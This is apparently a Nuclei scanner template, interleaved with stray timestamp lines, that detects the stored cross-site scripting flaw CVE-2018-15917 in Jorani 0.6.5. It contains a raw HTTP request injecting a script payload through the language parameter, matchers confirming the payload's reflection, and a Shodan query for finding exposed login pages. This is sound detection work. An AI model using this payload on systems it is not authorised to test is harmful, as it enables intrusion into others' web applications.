2023-08-31 15:43:46 +00:00
id : CVE-2018-15917
info :
name : Jorani Leave Management System 0.6.5 - Cross-Site Scripting
author : ritikchaddha
severity : medium
description : |
Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to the latest version to mitigate this vulnerability.
2023-08-31 15:43:46 +00:00
reference :
- https://www.exploit-db.com/exploits/45338
- https://nvd.nist.gov/vuln/detail/CVE-2018-15917
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2018-15917
cwe-id : CWE-79
metadata :
verified : true
2023-09-06 12:57:14 +00:00
max-request : 2
2023-08-31 15:43:46 +00:00
shodan-query : title:"Login - Jorani"
tags : cve,cve2018,jorani,xss
http :
- raw :
- |
GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1
Host : {{Hostname}}
- |
GET /session/login HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
2023-09-06 12:57:14 +00:00
2023-08-31 15:43:46 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<script>alert(document.domain)</script>'
- '_jorani'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200